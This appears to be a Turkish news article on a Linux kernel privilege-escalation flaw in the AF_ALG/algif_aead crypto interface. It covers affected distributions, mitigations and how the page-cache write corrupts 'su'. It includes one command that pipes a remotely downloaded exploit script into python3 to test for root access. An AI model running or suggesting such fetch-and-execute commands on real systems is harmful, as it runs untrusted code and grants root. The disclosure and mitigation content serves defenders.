Linux sistem yöneticileri için oldukça dikkat çekici bir yama haftası yaşanıyor. Güvenlik araştırmacıları tarafından keşfedilen kritik bir açık, yetkilendirilmemiş yerel kullanıcıların anında sistemin kök (root) yetkisine sahip olmasını sağlıyor. Bu durum, özellikle çok kullanıcılı sunucular, web sunucuları, Kubernetes gibi konteyner ortamları ve CI/CD (Sürekli Entegrasyon/Sürekli Teslimat) hatları için bir kabus senaryosu oluşturuyor.
CVE-2026-31431 olarak adlandırılan bu açık, 2017'den bu yana kullanımda olan neredeyse tüm Linux dağıtımlarını etkiliyor. Henüz sıfır gün açığı olmasa da, çekirdek için yama yayınlanmış olsa da, duyuru penceresinin darlığı dağıtım geliştiricilerine müdahale için çok az zaman bıraktı. Etkilenen dağıtımlar arasında Ubuntu 24, RHEL 10, Suse 16 ve Amazon Linux 2023 gibi popüler sistemler bulunuyor. Hatta Windows'un WSL2 (Windows Subsystem for Linux 2) sürümü de bu açıktan nasibini almış durumda ve sadece 732 baytlık bir veriyle bu saldırı gerçekleştirilebiliyor.
Sisteminizin bu açıktan etkilenip etkilenmediğini kontrol etmek için, standart bir yetkisiz kullanıcı hesabıyla “curl https://copy.fail/exp | python3 && su” komutunu çalıştırabilirsiniz. Ancak burada online bir komut dosyasına güvenmeniz gerektiğini unutmayın. Konsept kanıtı (proof-of-concept) kodları da incelemek isteyenler için erişilebilir durumda.
Eğer dağıtımınız henüz yama yayınlamadıysa, iki hafifletme yönteminden birini deneyebilirsiniz. Kernel modülü olarak algif_aaed yükleniyorsa, “install algif_aead /bin/false” komutunu /etc/modprobe.d/disable-algif.conf dosyasına eklemek yeterli olacaktır. Ancak RHEL ve WSL2 gibi bazı dağıtımlar bu işlevselliği doğrudan çekirdeğe derlediği için, bu tür durumlarda kullanıcıların AF_ALG soketleri açmasını seccomp profilleri, AppArmor veya SELinux aracılığıyla engellemek gerekebilir.
Araştırmacılar bu güvenlik açığını bir yapay zeka asistanı yardımıyla bulduklarını belirtti. Linux çekirdeğinin kaynak kodunun açık olmasından dolayı, ciddi bir saldırganın da bu açığı kolayca bulabileceği düşünülüyor. Bu nedenle açığın erken bir aşamada kamuoyu ile paylaşılması bir zorunluluk olarak görülüyor.
Açığın çalışma prensibi oldukça ustaca. AF_ALG, uygulamaların veri şifreleme veya şifre çözme işlemleri için kullanabildiği bir soket türüdür. Saldırı, sahip olunan bir çalıştırılabilir dosyanın bir parçasını etiket (tag) olarak sağlamakla gerçekleştiriliyor; en bariz örnek ise “su” komutudur. “algif_aead” çekirdek fonksiyonundaki kritik bir optimizasyon, şifrelenecek verinin kopyasını oluşturmak yerine, etiket verisini doğrudan çıktı tamponuna referans yoluyla zincirliyor. Rastlantısal olarak, “authencesn” şifreleme algoritması çıktı tamponunda sabit bir ofsette 4 bayt yazmayı içeriyor. Etiket olarak kullanılan “su” dosyasının sayfa verileri artık bu çıktının bir parçası olduğundan, bu baytlar doğrudan çekirdeğin çalıştırılabilir dosyanın önbelleğe alınmış kopyasına yazılıyor.
Çalıştırılabilir dosya çağrıldığında, bellek üzerinde bozulmaya uğrayarak yönetici erişimi sağlıyor. Bu işlemler tamamen bellekte gerçekleştiği için diskte herhangi bir iz bırakmıyor ve birçok güvenlik yazılımını da aşabiliyor.
